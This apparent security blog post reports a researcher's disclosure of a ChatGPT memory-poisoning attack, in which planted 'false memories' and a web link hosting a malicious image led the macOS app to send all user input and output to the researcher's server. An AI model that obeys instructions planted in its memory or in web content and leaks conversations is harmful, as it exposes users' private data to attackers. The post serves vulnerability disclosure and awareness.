Hacking ChatGPT by Planting False Memories into Its Data

Home / Uncategorized / Hacking ChatGPT by Planting False Memories into Its Data

Hacking ChatGPT by Planting False Memories into Its Data

October 1, 2024 0 Comments 0 tags

This vulnerability hacks a feature that allows ChatGPT to have long-term memory, where it uses information from past conversations to inform future conversations with that same user. A researcher found that he could use that feature to plant “false memories” into that context window that could subvert the model.

A month later, the researcher submitted a new disclosure statement. This time, he included a PoC that caused the ChatGPT app for macOS to send a verbatim copy of all user input and ChatGPT output to a server of his choice. All a target needed to do was instruct the LLM to view a web link that hosted a malicious image. From then on, all input and output to and from ChatGPT was sent to the attacker’s website.

Hacking ChatGPT by Planting False Memories into Its Data

Leave a Reply Cancel reply

Explore More

New Attack Against Self-Driving Car AI

Take a Selfie Using a NY Surveillance Camera

EPA ‘urgently’ needs to step up cybersecurity assistance for the water sector, GAO says